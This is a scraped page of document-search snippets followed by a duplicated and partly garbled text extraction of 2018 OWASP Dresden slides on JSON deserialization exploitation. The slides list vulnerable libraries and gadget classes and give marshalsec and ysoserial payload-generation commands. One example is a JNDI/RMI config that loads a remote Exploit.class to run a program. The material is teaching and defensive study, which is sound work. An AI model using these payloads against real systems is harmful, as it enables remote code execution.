Understanding JSON Schema
7 févr. 2022 JSON stands for “JavaScript Object Notation” a simple data interchange format. It began as a notation for the world wide web.
UnderstandingJSONSchema
C Json.net Schema Value Of Multiple Types
Doing so well understood in c value from both your book class newtonsoft multiple rows or an online json services you can use of added deserialization.
c json.net schema value of multiple types
Friday the 13th JSON Attacks
1 juill. 2017 Json.Net .NET. Configuration. Expected. Object. Graph. Inspection ... fully json.org compliant thread safe C# JSON library for server side ...
us Munoz Friday The th JSON Attacks wp
Json Deserialization Exploitation
7 juin 2018 1 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 ... default T parseJackson(Class<T> clazz String json) throws IOException.
Marshaller Deserialization Attacks
www.it-ebooks.info
%20REST-based%20applications%20or%20services%20and%20learn%20how%20to%20manage%20them%20using%20Microsoft%20Azure%20-2015.pdf
C# 9.0 in a Nutshell Supplement
features you need another choice is the popular third-party Json.NET library. If you need to interoperate with legacy SOAP-based web services
cs ian supplement
finPOWER Connect 3 Web Services Connectivity and Programming
17 mars 2014 require more than just simple URL parameters can POST either XML or JSON. • The finPOWER Connect Web Services consist of many individual ...
Web server
4 juill. 2015 What's new in the Web Server function manual Version 05/2021 compared to ... amework-4.7.2) with WebRequest class and. Json.Net library.
s webserver function manual en US en US
Get started guide for developers on Azure Microsoft Docs
28 juin 2021 AspNetCore.Mvc; using Newtonsoft.Json;. [Produces("application/json")]. [Route("api/Votes")] public class VotesController : Controller.
Developing Add-Ins for ArcGIS Pro (.NET) Esri Canada
11 oct. 2018 ArcGIS Online. ArcGIS Enterprise ... Use of Async / Await functionality in C# or VB .Net. Using the ArcGIS Pro Framework's QueuedTask class ...
developing .net addins for arcgis pro gandhar w kern r
1 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Json Deserialization Exploitation
RCE by Design
2 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
contentS1.Introduction
2.Basics
3.Exploitation
4.Summary / Further Research
3 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Introduction
DefCon 2017 ´)ULGM\ the 13th: JSON $PPMŃNVµ L1@ Slides quite rightly point out: 2016 was the ´\HMU of Java Deserialization MSRŃMO\SVHµ In the age of RESTful APIs and microservice architecture, the transmission of objects shifts to a JSON or XML serialized formUsage of JSON or XML more secure?
4 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Introduction
Moritz Bechler published a paper about deserialization vulnerabilities (focused onJava JSON and XML) [5]
.Net serialization libraries are affected as well [6] OWASP Top 10 2017 RC2 [7] ranked insecure deserialization to the eighth place5 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Introduction
6 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
ǞF!Ǜ: 1338,
ǞHG" 1Ǜ: "Test"
Dummy.json
default T parseJackson(ClassObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping(); mapper.configure(JsonParser.Feature.ALLOW_UNQUOTED_FIELD_NAMES, true);T object = mapper.readValue(json, clazz);
return object; public class Dummy { public int id; public Object object; public int getId() { return id;7 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
JSON marshallers should be able to reconstruct the object using the details present in JSON data unmarshaller creates a new object (allocates space in memory)using the default (parameterless) constructor
reflection to populate all fields or property members JSON libraries need to reconstruct objects by either: Calling default constructor and using reflection to set field values Calling default constructor and calling setters to set field values FMOOLQJ ´VSHŃLMOµ ŃRQVPUXŃPRUV P\SH ŃRQYHUPHUV RU ŃMOONMŃNV Calling common methods such as: hashcode(), toString(), equals(), finalize(), "8 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
9 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
10 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
JSON libraries invoked setters to populate object fields [5] and [6] focused their analysis on finding types with setters that could lead to arbitrary code execution (Java & .Net)11 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics Library Language Technologie
FastJSON .NET JSON
Json.Net .NET JSON
FSPickler .NET JSON
Sweet.Jayson .NET JSON
JavascriptSerializer .NET JSON
DataContractJsonSerializer .NET JSON
Jackson Java JSON
Genson Java JSON
JSON-IO Java JSON
FlexSON Java JSON
SnakeYAML (YAML) Java YAML
jYAML (YAML) Java YAMLYamlBeans (YAML) Java YAML
Apache Flex BlazeDS (AMF4) Java AMF4
Red5 IO AMF (AMF) Java AMF
Castor (XML) Java XML
Java XMLDecoder (XML) Java XML
Java Serialization (binary) Java binary
Kryo (binary) Java binary
Hessian/Burlap (binary/XML) Java binary/XML
XStream (XML/various) Java XML/various
12 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics ² GADGETs/Payload
Bean property based marshallers gadgets
call setter methods which means that far more code can be triggered directly during unmarshalling
13 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics ² GADGETs/Payloads
com.sun.rowset.JdbcRowSetImpl java.util.ServiceLoader$LazyIterator com.sun.jndi.rmi.registry.BindingEnumeration com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl javax.imageio.ImageIO$ContainsFilterCommons Configuration JNDIConfiguration
C3P0 JndiRefForwardingDataSource
C3P0 WrapperConnectionPoolDataSource
Spring Beans PropertyPathFactoryBean
Spring AOP PartiallyComparableAdvisorHolder
Spring AOP AbstractBeanFactoryPointcutAdvisor
Spring DefaultListableBeanFactory
Apache XBean
Caucho Resin
javax.script.ScriptEngineManagerCommons Beanutils BeanComparator
ROME EqualsBean/ToStringBean
Groovy Expando/MethodClosure
sun.rmi.server.UnicastRef(2) java.rmi.server.UnicastRemoteObject14 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
Moritz Bechler published a payload generator based on his previous workhttps://github.com/mbechler/marshalsec/
Payload Generation via marshal
java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -a -v java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.JsonIO -a -v15 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
Payload Generation via marko-marshal [8]
URI jndiUrl = new URI("rmi://localhost:1069/Exploit");Configuration c = Configuration
.create() .all(true) .codebase("http://localhost:31337/") .codebaseClass("Exploit.class") .JNDIUrl(jndiUrl) .escapeType(EscapeType.NONE) .executable("C:\\Windows\\notepad.exe", "") .gadgetType(GadgetType.SpringPropertyPathFactory) .build(); MarshalsecFactory factory = new MarshalsecFactory(c); ListSystem.out::println)
16 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
JNDI Exploitation ² Basics
JNDI is the Java Interface to interact with Naming and Directory Services offers a single common interface to interact with disparate Naming and Directory services such asRemote Method Invocation (RMI)
Lightweight Directory Access Protocol (LDAP),
Active Directory,
Domain Name System (DNS),
Common Object Request Broker Architecture (CORBA),etc.
17 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
JNDI Exploitation ² Basics [9]
Java Virtual Machine (JVM) allows loading of custom classes from a remote source without any restrictions18 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
RMI Exploitation [9] - Java remote method invocation19 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
RMI Exploitation [9] - Java remote method invocation20 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
RMI Exploitation ² Limitation
Java 8u121 finally added that codebase restriction, but only for RMI at this point21 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
DEMO TIME
[10] https://github.com/no-sec-marko/java-web-vulnerabilitiesExploitation
22 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
All serializers need to reconstruct objects and will normally invoke methods Problem is not limited to Java (e.g. BinaryFormatter in .Net) ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -base64 -c "ping 10.0.0.19" > execute-ping.txtQuelle: https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
23 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Summary / FuRther Work
JSON is not safe
Security by design: identify the use of known vulnerable componentshttps://www.cvedetails.com/cve/CVE-2017-9805/
Other libraries? (Vert.x)
Burp Plugin (Burp Collaborator)
24 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Summary / FuRther Work ??
1 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Json Deserialization Exploitation
RCE by Design
2 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
contentS1.Introduction
2.Basics
3.Exploitation
4.Summary / Further Research
3 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Introduction
DefCon 2017 ´)ULGM\ the 13th: JSON $PPMŃNVµ L1@ Slides quite rightly point out: 2016 was the ´\HMU of Java Deserialization MSRŃMO\SVHµ In the age of RESTful APIs and microservice architecture, the transmission of objects shifts to a JSON or XML serialized formUsage of JSON or XML more secure?
4 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Introduction
Moritz Bechler published a paper about deserialization vulnerabilities (focused onJava JSON and XML) [5]
.Net serialization libraries are affected as well [6] OWASP Top 10 2017 RC2 [7] ranked insecure deserialization to the eighth place5 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Introduction
6 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
ǞF!Ǜ: 1338,
ǞHG" 1Ǜ: "Test"
Dummy.json
default T parseJackson(ClassObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping(); mapper.configure(JsonParser.Feature.ALLOW_UNQUOTED_FIELD_NAMES, true);T object = mapper.readValue(json, clazz);
return object; public class Dummy { public int id; public Object object; public int getId() { return id;7 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
JSON marshallers should be able to reconstruct the object using the details present in JSON data unmarshaller creates a new object (allocates space in memory)using the default (parameterless) constructor
reflection to populate all fields or property members JSON libraries need to reconstruct objects by either: Calling default constructor and using reflection to set field values Calling default constructor and calling setters to set field values FMOOLQJ ´VSHŃLMOµ ŃRQVPUXŃPRUV P\SH ŃRQYHUPHUV RU ŃMOONMŃNV Calling common methods such as: hashcode(), toString(), equals(), finalize(), "8 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
9 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
10 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics
JSON libraries invoked setters to populate object fields [5] and [6] focused their analysis on finding types with setters that could lead to arbitrary code execution (Java & .Net)11 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics Library Language Technologie
FastJSON .NET JSON
Json.Net .NET JSON
FSPickler .NET JSON
Sweet.Jayson .NET JSON
JavascriptSerializer .NET JSON
DataContractJsonSerializer .NET JSON
Jackson Java JSON
Genson Java JSON
JSON-IO Java JSON
FlexSON Java JSON
SnakeYAML (YAML) Java YAML
jYAML (YAML) Java YAMLYamlBeans (YAML) Java YAML
Apache Flex BlazeDS (AMF4) Java AMF4
Red5 IO AMF (AMF) Java AMF
Castor (XML) Java XML
Java XMLDecoder (XML) Java XML
Java Serialization (binary) Java binary
Kryo (binary) Java binary
Hessian/Burlap (binary/XML) Java binary/XML
XStream (XML/various) Java XML/various
12 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics ² GADGETs/Payload
Bean property based marshallers gadgets
call setter methods which means that far more code can be triggered directly during unmarshalling
13 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Basics ² GADGETs/Payloads
com.sun.rowset.JdbcRowSetImpl java.util.ServiceLoader$LazyIterator com.sun.jndi.rmi.registry.BindingEnumeration com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl javax.imageio.ImageIO$ContainsFilterCommons Configuration JNDIConfiguration
C3P0 JndiRefForwardingDataSource
C3P0 WrapperConnectionPoolDataSource
Spring Beans PropertyPathFactoryBean
Spring AOP PartiallyComparableAdvisorHolder
Spring AOP AbstractBeanFactoryPointcutAdvisor
Spring DefaultListableBeanFactory
Apache XBean
Caucho Resin
javax.script.ScriptEngineManagerCommons Beanutils BeanComparator
ROME EqualsBean/ToStringBean
Groovy Expando/MethodClosure
sun.rmi.server.UnicastRef(2) java.rmi.server.UnicastRemoteObject14 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
Moritz Bechler published a payload generator based on his previous workhttps://github.com/mbechler/marshalsec/
Payload Generation via marshal
java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -a -v java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.JsonIO -a -v15 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
Payload Generation via marko-marshal [8]
URI jndiUrl = new URI("rmi://localhost:1069/Exploit");Configuration c = Configuration
.create() .all(true) .codebase("http://localhost:31337/") .codebaseClass("Exploit.class") .JNDIUrl(jndiUrl) .escapeType(EscapeType.NONE) .executable("C:\\Windows\\notepad.exe", "") .gadgetType(GadgetType.SpringPropertyPathFactory) .build(); MarshalsecFactory factory = new MarshalsecFactory(c); ListSystem.out::println)
16 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
JNDI Exploitation ² Basics
JNDI is the Java Interface to interact with Naming and Directory Services offers a single common interface to interact with disparate Naming and Directory services such asRemote Method Invocation (RMI)
Lightweight Directory Access Protocol (LDAP),
Active Directory,
Domain Name System (DNS),
Common Object Request Broker Architecture (CORBA),etc.
17 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
JNDI Exploitation ² Basics [9]
Java Virtual Machine (JVM) allows loading of custom classes from a remote source without any restrictions18 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
RMI Exploitation [9] - Java remote method invocation19 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
RMI Exploitation [9] - Java remote method invocation20 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
RMI Exploitation ² Limitation
Java 8u121 finally added that codebase restriction, but only for RMI at this point21 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
DEMO TIME
[10] https://github.com/no-sec-marko/java-web-vulnerabilitiesExploitation
22 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018
Exploitation
All serializers need to reconstruct objects and will normally invoke methods Problem is not limited to Java (e.g. BinaryFormatter in .Net) ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -base64 -c "ping 10.0.0.19" > execute-ping.txtQuelle: https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution